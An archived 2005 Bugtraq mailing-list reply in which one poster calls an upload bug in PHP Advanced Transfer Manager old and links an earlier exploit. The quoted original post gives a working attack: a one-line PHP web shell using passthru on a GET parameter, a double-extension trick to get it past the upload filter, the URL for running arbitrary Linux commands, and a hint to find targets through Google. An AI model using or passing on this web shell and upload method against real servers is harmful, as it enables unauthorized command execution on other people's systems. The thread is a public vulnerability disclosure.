[40978] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: uplod phpshell in PHP Advanced Transfer Manager

daemon@ATHENA.MIT.EDU (D_BuG)
Mon Oct 31 17:43:15 2005

Date: Sun, 30 Oct 2005 06:23:00 +0300
From: D_BuG <d_bug@bk.ru>
Reply-To: D_BuG <d_bug@bk.ru>
Message-ID: <649238019.20051030062300@bk.ru>
To: sQl@hotmail.com, bugtraq@securityfocus.com
In-Reply-To: <20051029184603.26035.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=windows-1251
Content-Transfer-Encoding: 8bit

Read link =)

http://www.securityfocus.com/bid/13542/exploit

This old bug ;)


Good luke discovered!

> <

> uplod phpshell in PHP Advanced Transfer Manager

> one save as the code :

> --------

> <pre>
> <?
> passthru($_GET['sQl']);
?>>

> --------

file >> save as > sQl.php.ns

> now upload in the  PHP Advanced Transfer Manager

> end the upload go to >

> www.site.com/[file upload name]/[files]/sQl.php.ns?sQl=[command linux]

> search google :

> PHP Advanced Transfer Manager

> }

> by sQl

> sQl[at]homail.[com]

> {

>>


-- 
С уважением, Денис.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40978] in bugtraq

Re: uplod phpshell in PHP Advanced Transfer Manager

daemon@ATHENA.MIT.EDU (D_BuG)Mon Oct 31 17:43:15 2005

daemon@ATHENA.MIT.EDU (D_BuG)
Mon Oct 31 17:43:15 2005